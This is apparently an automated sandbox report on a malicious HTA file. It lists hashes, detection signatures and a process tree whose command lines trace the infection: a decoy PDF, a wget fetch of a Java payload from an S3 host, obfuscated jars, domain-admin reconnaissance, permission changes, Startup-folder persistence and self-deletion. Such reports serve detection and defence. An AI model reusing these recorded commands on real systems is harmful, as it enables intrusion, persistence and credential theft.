Edit tour

Windows Analysis Report
malw.hta

Overview

General Information

Sample name:	malw.hta
Analysis ID:	1585904
MD5:	dec60ca60be42e773185a13efa81eb28
SHA1:	5962886e261416527b80e8e0491ca26ad90fdaf6
SHA256:	e742dec81195181de546e67424458e1ba8bdc84ef2602e3b2b0935f16433b6d5
Tags:	htaMT103Ctznbankuser-JAMESWT_MHT
Infos:

Detection

Branchlock Obfuscator

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Execute DLL with spoofed extension

Yara detected Branchlock Obfuscator

AI detected suspicious sample

Command shell drops VBS files

Found Tor onion address

Self deletion via cmd or bat file

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Uses whoami command line tool to query computer and username

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Binary contains a suspicious time stamp

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Potentially Suspicious Rundll32 Activity

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6252 cmdline: mshta.exe "C:\Users\user\Desktop\malw.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

rundll32.exe (PID: 5960 cmdline: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf" MD5: 889B99C52A60DD49227C5E485A016679)

Acrobat.exe (PID: 6416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\swiftcopy.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 5972 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 4828 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1584,i,9657057088581335983,7569918057650500138,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

cmd.exe (PID: 7844 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wget.exe (PID: 7896 cmdline: "wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip" MD5: F2D3E44AFA5CBBBF41ECB3A87066CBF2)

unzip.exe (PID: 7952 cmdline: "unzip.exe" "jre-1.8.zip" -d "jre" MD5: FECF803F7D84D4CFA81277298574D6E6)

javaw.exe (PID: 6996 cmdline: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\recovery.jar" MD5: 7270D33BAB4BD8AFE03E6D3F36A51D20)

icacls.exe (PID: 5820 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

javaw.exe (PID: 3580 cmdline: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\history.jar" MD5: 7270D33BAB4BD8AFE03E6D3F36A51D20)

javaw.exe (PID: 1600 cmdline: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar" MD5: 7270D33BAB4BD8AFE03E6D3F36A51D20)

WMIC.exe (PID: 6896 cmdline: wmic computersystem get domain MD5: E2DE6500DE1148C7F6027AD50AC8B891)

conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 7208 cmdline: whoami /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 4876 cmdline: whoami /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 5728 cmdline: net group "Domain Admins" /domain MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3924 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cscript.exe (PID: 3940 cmdline: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs" MD5: CB601B41D4C8074BE8A84AED564A94DC)

javaw.exe (PID: 6952 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar" MD5: 7270D33BAB4BD8AFE03E6D3F36A51D20)

cscript.exe (PID: 6544 cmdline: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs" MD5: CB601B41D4C8074BE8A84AED564A94DC)

wscript.exe (PID: 4896 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js" MD5: FF00E0480075B095948000BDC66E81F0)

cscript.exe (PID: 4920 cmdline: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs" MD5: CB601B41D4C8074BE8A84AED564A94DC)

cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6900 cmdline: timeout /t 5 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

OUTLOOK.EXE (PID: 5788 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding MD5: 91A5292942864110ED734005B7E005C0)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\checker.jar	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\3.jar	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\history.jar	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\recovery.jar	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
0000001F.00000002.3365267882.00000000042CC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000014.00000002.3260775914.00000000154C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000014.00000003.3228221272.0000000001555000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000010.00000002.3206788432.0000000015650000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000010.00000003.3164511187.0000000001314000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
0000001F.00000003.3269384093.0000000000565000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
00000013.00000003.3211107800.0000000001614000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
Process Memory Space: unzip.exe PID: 7952	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
Process Memory Space: javaw.exe PID: 6996	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
Process Memory Space: javaw.exe PID: 3580	JoeSecurity_BranchlockObfuscator	Yara detected Branchlock Obfuscator	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Executable

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6252, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6252, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\malw.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6252, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat", ProcessId: 7844, ProcessName: cmd.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", CommandLine: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7844, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", ProcessId: 3940, ProcessName: cscript.exe

Sigma detected: Potentially Suspicious Rundll32 Activity

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", CommandLine: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\malw.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6252, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", ProcessId: 5960, ProcessName: rundll32.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe, ParentProcessId: 1600, ParentProcessName: javaw.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5728, ProcessName: net.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", CommandLine: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7844, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs", ProcessId: 3940, ProcessName: cscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\whoami.exe, NewProcessName: C:\Windows\SysWOW64\whoami.exe, OriginalFileName: C:\Windows\SysWOW64\whoami.exe, ParentCommandLine: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe, ParentProcessId: 1600, ParentProcessName: javaw.exe, ProcessCommandLine: whoami /groups, ProcessId: 7208, ProcessName: whoami.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe, ParentProcessId: 1600, ParentProcessName: javaw.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5728, ProcessName: net.exe

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", CommandLine: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\malw.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6252, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf", ProcessId: 5960, ProcessName: rundll32.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_bbcec261-3

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\README.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME.txt

Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000010.00000002.3210536015.0000000074AA7000.00000002.00000001.01000000.00000011.sdmp, javaw.exe, 00000013.00000002.3227337817.0000000074AA7000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libzip\zip.pdb** source: javaw.exe, 00000010.00000002.3209667965.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp, javaw.exe, 00000013.00000002.3226062299.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: javaw.exe, 00000013.00000002.3227054856.0000000073F75000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunmscapi\sunmscapi.pdb source: javaw.exe, 00000010.00000002.3210045786.0000000070045000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libmanagement\management.pdb source: javaw.exe, 00000013.00000002.3227054856.0000000073F75000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: javaw.exe, 00000010.00000002.3210220560.0000000073E17000.00000002.00000001.01000000.00000015.sdmp, javaw.exe, 00000013.00000002.3225518070.000000006FB47000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbj source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000010.00000002.3210220560.0000000073E17000.00000002.00000001.01000000.00000015.sdmp, javaw.exe, 00000013.00000002.3225518070.000000006FB47000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnet\net.pdb.. source: javaw.exe, 00000010.00000002.3209510549.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp, javaw.exe, 00000013.00000002.3225755254.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: javaw.exe, javaw.exe, 00000013.00000002.3226453449.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: javaw.exe, javaw.exe, 00000013.00000002.3226694507.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: javaw.exe, 00000010.00000002.3209876576.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp, javaw.exe, 00000013.00000002.3226453449.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000010.00000002.3209667965.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp, javaw.exe, 00000013.00000002.3226062299.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunec\sunec.pdb99 source: javaw.exe, 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000010.00000000.3164227804.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000013.00000002.3218511796.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000013.00000000.3210841601.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: javaw.exe, 00000010.00000002.3210390998.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp, javaw.exe, 00000013.00000002.3226694507.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000010.00000002.3209510549.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp, javaw.exe, 00000013.00000002.3225755254.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunec\sunec.pdb source: javaw.exe, 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FE80 LoadLibraryA,GetProcAddress,strlen,malloc,strcpy,strcat,FindFirstFileExA,FindNextFileA,FindClose,FreeLibrary,FindFirstFileA,	15_2_0041FE80
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041F460 isalpha,FindFirstFileA,strcpy,FindClose,strcpy,FindClose,_errno,_errno,	15_2_0041F460
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041B000 strlen,malloc,strlen,malloc,strcpy,FindFirstFileA,strcpy,free,free,free,	15_2_0041B000
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041B0F9 FindFirstFileA,strcpy,free,	15_2_0041B0F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FD10 GetModuleHandleA,GetProcAddress,GetFileAttributesA,FreeLibrary,FindFirstFileA,FindClose,	15_2_0041FD10
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FDCC FreeLibrary,FindFirstFileA,FindClose,	15_2_0041FDCC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041F66C FindFirstFileA,strcpy,FindClose,strcpy,	15_2_0041F66C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E06AFD FindFirstFileA,FindNextFileA,_strlen,_strlen,_strlen,FindClose,	16_2_00E06AFD
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E20B20 FindFirstFileExW,	16_2_00E20B20
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB44528 _Java_sun_nio_fs_WindowsNativeDispatcher_FindFirstFile0@20,FindFirstFileW,wcslen,GetLastError,	19_2_6FB44528
